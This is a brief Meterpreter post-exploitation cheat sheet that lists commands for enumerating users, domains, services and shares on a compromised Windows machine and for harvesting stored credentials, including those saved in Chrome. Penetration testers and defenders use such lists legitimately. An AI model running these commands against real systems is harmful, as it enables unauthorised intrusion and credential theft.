Meterpreter Pillaging/Data Harvesting
--> Obtain basic system information
--> Check the current user.
run post/windows/gather/
--> Lists all Meterpreter pillaging scripts.
run post/windows/gather/enum_services
--> Obtain all running services on a Windows machine.
wmic service get Caption,StartName,State,pathname
--> Obtain all running services on a Windows machine.
run post/windows/gather/enum_domains
--> Determine what domains target is in.
net group “Domain Controllers” /domain
--> Determine the domain controller of
net user
--> Displays users on Windows system.
run post/windows/gather/enum_ad_users
--> Enumerates accounts in active domain.
net user /domain
--> Enumerates accounts in active domain.
net localgroup
--> Lists all local groups on system.
net localgroup group_name
--> Lists all users within group.
run post/windows/gather/enum_shares
--> Lists all shared resources on system.
net share
--> Lists all shared resources on system.
run scraper
--> Runs pillage automation script.
run winenum
--> Runs Windows pillage automation script.
run post/windows/gather/credentials
--> Searches for credentials on a system.
run post/gather/enum_chrome
--> Searches for credentials stored in Google Chrome.
run post/windows/gather/enum_application
--> Lists installed software on system.
Last updated